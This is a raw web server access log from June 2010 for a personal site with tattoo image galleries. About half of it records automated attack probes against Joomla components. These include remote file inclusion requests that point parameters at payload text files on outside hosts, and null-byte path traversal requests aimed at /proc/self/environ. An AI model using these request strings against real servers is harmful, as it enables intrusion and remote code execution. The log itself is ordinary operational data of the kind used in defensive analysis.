72.135.55.205 - - [01/Jun/2010:21:57:28 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:57:28 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:57:28 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:57:28 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:57:28 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:57:28 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:57:28 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:57:30 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
207.46.13.41 - - [01/Jun/2010:21:58:12 -0500] "GET /logs/access_log.1166054400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.135.55.205 - - [01/Jun/2010:21:58:22 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:58:22 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:58:22 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:58:23 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:58:23 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:58:23 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:58:23 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:58:23 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:58:23 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:58:23 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:58:23 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:59:18 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:59:18 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:59:18 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:59:18 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:59:18 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:59:19 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:59:19 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:59:19 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:59:19 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:59:19 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:59:19 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:59:42 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:59:42 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:59:42 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:59:42 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:59:42 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:59:42 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:59:42 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:59:42 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:59:42 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:59:43 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:21:59:44 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:22:00:14 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:22:00:14 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:22:00:14 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
72.135.55.205 - - [01/Jun/2010:22:00:14 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.1)"
121.88.4.141 - - [01/Jun/2010:22:01:23 -0500] "GET /logs/access_log.1271721600/index.php?option=com_jfeedback&controller=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:22:02:06 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:22:02:06 -0500] "GET /logs/access_log.1271721600//components/com_facileforms/facileforms.frame.php?ff_compath=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:22:02:06 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
66.246.72.178 - - [01/Jun/2010:22:02:28 -0500] "GET /logs/access_log.1272240000//components/com_facileforms/facileforms.frame.php?ff_compath=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
67.195.112.180 - - [01/Jun/2010:22:03:20 -0500] "GET /logs/access_log.1243468800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.121.67.233 - - [01/Jun/2010:22:04:45 -0500] "GET /logs/access_log.1271203200//atom.php5?page=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.121.67.233 - - [01/Jun/2010:22:04:45 -0500] "GET //atom.php5?page=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.121.67.233 - - [01/Jun/2010:22:04:45 -0500] "GET /logs//atom.php5?page=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.121.67.233 - - [01/Jun/2010:22:04:46 -0500] "GET /logs/access_log.1271376000//atom.php5?page=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.121.67.233 - - [01/Jun/2010:22:04:47 -0500] "GET /logs//atom.php5?page=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.121.67.233 - - [01/Jun/2010:22:04:47 -0500] "GET /logs/access_log.1271203200//atom.php5?page=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.121.67.233 - - [01/Jun/2010:22:04:47 -0500] "GET //atom.php5?page=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
193.252.118.174 - - [01/Jun/2010:22:12:41 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
87.249.116.188 - - [01/Jun/2010:22:14:47 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
87.249.116.188 - - [01/Jun/2010:22:14:47 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
87.249.116.188 - - [01/Jun/2010:22:15:05 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
87.249.116.188 - - [01/Jun/2010:22:15:05 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
87.249.116.188 - - [01/Jun/2010:22:15:24 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
87.249.116.188 - - [01/Jun/2010:22:15:37 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
87.249.116.188 - - [01/Jun/2010:22:15:40 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
87.249.116.188 - - [01/Jun/2010:22:15:42 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
66.246.72.178 - - [01/Jun/2010:22:16:57 -0500] "GET /logs/access_log.1272499200//components/com_facileforms/facileforms.frame.php?ff_compath=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
87.249.116.188 - - [01/Jun/2010:22:17:08 -0500] "GET /logs/access_log.1274832000/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
87.249.116.188 - - [01/Jun/2010:22:17:08 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
87.249.116.188 - - [01/Jun/2010:22:17:09 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
87.249.116.188 - - [01/Jun/2010:22:18:36 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
87.249.116.188 - - [01/Jun/2010:22:19:44 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
87.249.116.188 - - [01/Jun/2010:22:19:45 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
87.249.116.188 - - [01/Jun/2010:22:19:45 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
87.249.116.188 - - [01/Jun/2010:22:20:16 -0500] "GET /logs/access_log.1274832000/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
87.249.116.188 - - [01/Jun/2010:22:20:16 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
87.249.116.188 - - [01/Jun/2010:22:20:16 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
87.249.116.188 - - [01/Jun/2010:22:21:13 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
87.249.116.188 - - [01/Jun/2010:22:21:13 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
87.249.116.188 - - [01/Jun/2010:22:21:13 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
207.46.13.48 - - [01/Jun/2010:22:21:34 -0500] "GET /logs/access_log.1255478400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.238.145.196 - - [01/Jun/2010:22:23:52 -0500] "GET /logs/access_log.1274832000//com_cropimage/admin.cropcanvas.php?cropimagedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 346 "-""libwww-perl/5.833"
89.238.145.196 - - [01/Jun/2010:22:23:53 -0500] "GET //com_cropimage/admin.cropcanvas.php?cropimagedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 319 "-""libwww-perl/5.833"
89.238.145.196 - - [01/Jun/2010:22:23:54 -0500] "GET /logs//com_cropimage/admin.cropcanvas.php?cropimagedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 324 "-""libwww-perl/5.833"
94.23.11.114 - - [01/Jun/2010:22:23:59 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.803"
94.23.11.114 - - [01/Jun/2010:22:24:00 -0500] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
87.249.116.188 - - [01/Jun/2010:22:24:10 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
66.249.65.59 - - [01/Jun/2010:22:24:56 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.249.116.188 - - [01/Jun/2010:22:24:59 -0500] "GET /logs/access_log.1274832000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
87.249.116.188 - - [01/Jun/2010:22:24:59 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
87.249.116.188 - - [01/Jun/2010:22:24:59 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
216.129.119.43 - - [01/Jun/2010:22:26:21 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
94.136.63.119 - - [01/Jun/2010:22:28:12 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.136.63.119 - - [01/Jun/2010:22:28:16 -0500] "GET /index.php?option=com_webeecomment&controller=http://www.betheltempleag.com/images/id.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.136.63.119 - - [01/Jun/2010:22:28:21 -0500] "GET /index.php?option=com_webeecomment&controller= HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.11.114 - - [01/Jun/2010:22:28:34 -0500] "GET /logs/?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7924 "-""libwww-perl/5.803"
